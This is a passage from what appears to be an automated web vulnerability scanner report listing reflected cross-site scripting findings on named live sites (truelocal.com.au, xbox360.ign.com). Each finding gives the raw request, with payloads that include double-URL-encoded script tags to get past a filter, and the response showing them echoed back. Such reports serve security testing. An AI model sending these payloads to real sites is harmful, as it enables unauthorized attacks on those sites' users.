The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /cms/privacy-policyef381%253cscript%253ealert%25281%2529%253c%252fscript%253eed2d1b28db1 HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:08:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:08:25 GMT
Content-Length: 19667
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/favicon.ico?v=8.5"/>
...[SNIP]...
</script>ed2d1b28db1 -->
I/O Error - java.io.FileNotFoundException: http://localhost:8080/cms-web/media-view.action?seoURL=privacy-policyef381<script>alert(1)</script>ed2d1b28db1
</div>
...[SNIP]...

1.382. http://www.truelocal.com.au/cms/ratings-reviews [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truelocal.com.au
Path:	/cms/ratings-reviews

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 293fe%253cscript%253ealert%25281%2529%253c%252fscript%253ec0e2e1b4926 was submitted in the REST URL parameter 2. This input was echoed as 293fe<script>alert(1)</script>c0e2e1b4926 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /cms/ratings-reviews293fe%253cscript%253ealert%25281%2529%253c%252fscript%253ec0e2e1b4926 HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:08:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:08:12 GMT
Content-Length: 19672
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/favicon.ico?v=8.5"/>
...[SNIP]...
</script>c0e2e1b4926 -->
I/O Error - java.io.FileNotFoundException: http://localhost:8080/cms-web/media-view.action?seoURL=ratings-reviews293fe<script>alert(1)</script>c0e2e1b4926
</div>
...[SNIP]...

1.383. http://www.truelocal.com.au/cms/ratings-reviews [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truelocal.com.au
Path:	/cms/ratings-reviews

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload c5678%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8fd885b838 was submitted in the REST URL parameter 2. This input was echoed as c5678--><script>alert(1)</script>a8fd885b838 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /cms/ratings-reviewsc5678%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8fd885b838 HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:08:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:08:16 GMT
Content-Length: 19717
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/favicon.ico?v=8.5"/>
...[SNIP]...
<script>alert(1)</script>a8fd885b838 -->
...[SNIP]...

1.384. http://www.truelocal.com.au/cms/ratings-reviews/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truelocal.com.au
Path:	/cms/ratings-reviews/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e597e%253cscript%253ealert%25281%2529%253c%252fscript%253edf45febafd9 was submitted in the REST URL parameter 2. This input was echoed as e597e<script>alert(1)</script>df45febafd9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /cms/ratings-reviewse597e%253cscript%253ealert%25281%2529%253c%252fscript%253edf45febafd9/ HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:07:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:07:52 GMT
Content-Length: 19675
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/favicon.ico?v=8.5"/>
...[SNIP]...
</script>df45febafd9 -->
I/O Error - java.io.FileNotFoundException: http://localhost:8080/cms-web/media-view.action?seoURL=ratings-reviewse597e<script>alert(1)</script>df45febafd9
</div>
...[SNIP]...

1.385. http://www.truelocal.com.au/cms/ratings-reviews/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truelocal.com.au
Path:	/cms/ratings-reviews/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 611c1%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1a30a0b0178 was submitted in the REST URL parameter 2. This input was echoed as 611c1--><script>alert(1)</script>1a30a0b0178 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /cms/ratings-reviews611c1%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1a30a0b0178/ HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:07:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:07:55 GMT
Content-Length: 19720
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/favicon.ico?v=8.5"/>
...[SNIP]...
<script>alert(1)</script>1a30a0b0178 -->
...[SNIP]...

1.386. http://www.truelocal.com.au/cms/terms-conditions [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truelocal.com.au
Path:	/cms/terms-conditions

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 932af%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3077bfbd156 was submitted in the REST URL parameter 2. This input was echoed as 932af--><script>alert(1)</script>3077bfbd156 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /cms/terms-conditions932af%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3077bfbd156 HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:08:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:08:34 GMT
Content-Length: 19734
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/favicon.ico?v=8.5"/>
...[SNIP]...
<script>alert(1)</script>3077bfbd156 -->
...[SNIP]...

1.387. http://www.truelocal.com.au/cms/terms-conditions [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truelocal.com.au
Path:	/cms/terms-conditions

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 49835%253cscript%253ealert%25281%2529%253c%252fscript%253e3afa86b58a0 was submitted in the REST URL parameter 2. This input was echoed as 49835<script>alert(1)</script>3afa86b58a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /cms/terms-conditions49835%253cscript%253ealert%25281%2529%253c%252fscript%253e3afa86b58a0 HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:08:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:08:30 GMT
Content-Length: 19689
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/favicon.ico?v=8.5"/>
...[SNIP]...
</script>3afa86b58a0 -->
I/O Error - java.io.FileNotFoundException: http://localhost:8080/cms-web/media-view.action?seoURL=terms-conditions49835<script>alert(1)</script>3afa86b58a0
</div>
...[SNIP]...

1.388. http://www.truelocal.com.au/map.do [search.location parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.truelocal.com.au
Path:	/map.do

Issue detail

The value of the search.location request parameter is copied into the HTML document as plain text between tags. The payload bb192<a%20b%3dc>6cd27b93a33 was submitted in the search.location parameter. This input was echoed as bb192<a b=c>6cd27b93a33 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /map.do?search.location=Perthbb192<a%20b%3dc>6cd27b93a33 HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:07:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:07:49 GMT
Content-Length: 29597
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/Favicon.ico?v=8.5"
...[SNIP]...
<h1>Perthbb192<a b=c>6cd27b93a33</h1>
...[SNIP]...

1.389. http://www.truelocal.com.au/map.do [search.location parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.truelocal.com.au
Path:	/map.do

Issue detail

The value of the search.location request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17b17"><a%20b%3dc>3347b469f95 was submitted in the search.location parameter. This input was echoed as 17b17"><a b=c>3347b469f95 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /map.do?search.location=Perth17b17"><a%20b%3dc>3347b469f95 HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:07:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:07:26 GMT
Content-Length: 29654
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/Favicon.ico?v=8.5"
...[SNIP]...
name="search.location" title="Suburb, City & State or Postcode" size="52" id="input-search-location" class="tl-ui-autocomplete ui-autocomplete-location input-search input-search-location" value="Perth17b17"><a b=c>3347b469f95">
...[SNIP]...

1.390. http://www.truelocal.com.au/map.do [search.location parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.truelocal.com.au
Path:	/map.do

Issue detail

The value of the search.location request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf3e4'%3bb685ea0f67a was submitted in the search.location parameter. This input was echoed as cf3e4';b685ea0f67a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /map.do?search.location=Perthcf3e4'%3bb685ea0f67a HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:07:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:07:44 GMT
Content-Length: 29529
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
   <link rel="shortcut icon" href="/style/img/Favicon.ico?v=8.5"
...[SNIP]...
<![CDATA[

   function applyQuickSearchLocation(id, searchTerm) {
       var location1 = $('#searchlocation').val();
       var location2 = 'Perthcf3e4';b685ea0f67a';
       var location = location1 != '' ? location1 : location2;
       if(location == null || location == '') {
           location = 'Ballarat';
       }
       var url = "/map.do?search.term=" + searchTerm + "&search.location
...[SNIP]...

1.391. http://xbox360.ign.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f211"><script>alert(1)</script>f9723cc541b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2f211"><script>alert(1)</script>f9723cc541b=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763364553v-63n-12mc+1317763364553mv+63mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 152304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://xbox360.ign.com/?2f211"><script>alert(1)</script>f9723cc541b=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.392. http://xbox360.ign.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db040"-alert(1)-"41100177bfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?db040"-alert(1)-"41100177bfe=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763367174v-68n-12mc+1317763367174mv+68mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 152243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://xbox360.ign.com/?db040"-alert(1)-"41100177bfe=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.393. http://xbox360.ign.com/articles/117/1179415p1.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/articles/117/1179415p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe61e"><script>alert(1)</script>3374af020b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/117/1179415p1.html?fe61e"><script>alert(1)</script>3374af020b6=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763370104v-75n-12mc+1317763370104mv+75mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 115174

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://xbox360.ign.com/articles/117/1179415p1.html?fe61e"><script>alert(1)</script>3374af020b6=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.394. http://xbox360.ign.com/articles/117/1179415p1.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/articles/117/1179415p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a4c7"-alert(1)-"1ca15576805 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /articles/117/1179415p1.html?6a4c7"-alert(1)-"1ca15576805=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763372186v-80n-12mc+1317763372186mv+80mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 115761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
reGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://xbox360.ign.com/articles/117/1179415p1.html?6a4c7"-alert(1)-"1ca15576805=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.395. http://xbox360.ign.com/articles/119/1193225p1.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/articles/119/1193225p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d9e6"-alert(1)-"72182036bb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /articles/119/1193225p1.html?5d9e6"-alert(1)-"72182036bb8=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763375767v-86n-12mc+1317763375767mv+86mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 122697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
reGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://xbox360.ign.com/articles/119/1193225p1.html?5d9e6"-alert(1)-"72182036bb8=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.396. http://xbox360.ign.com/articles/119/1193225p1.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/articles/119/1193225p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa3fc"><script>alert(1)</script>12a690af773 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/119/1193225p1.html?aa3fc"><script>alert(1)</script>12a690af773=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763372376v-82n-12mc+1317763372376mv+82mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 122896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://xbox360.ign.com/articles/119/1193225p1.html?aa3fc"><script>alert(1)</script>12a690af773=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.397. http://xbox360.ign.com/articles/119/1197270p1.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/articles/119/1197270p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6053"><script>alert(1)</script>00ade51e0d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/119/1197270p1.html?b6053"><script>alert(1)</script>00ade51e0d9=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763372376v-83n-12mc+1317763372376mv+83mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 131356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://xbox360.ign.com/articles/119/1197270p1.html?b6053"><script>alert(1)</script>00ade51e0d9=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.398. http://xbox360.ign.com/articles/119/1197270p1.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/articles/119/1197270p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9beab"-alert(1)-"049047694c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /articles/119/1197270p1.html?9beab"-alert(1)-"049047694c2=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763375769v-87n-12mc+1317763375769mv+87mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 136639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
reGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
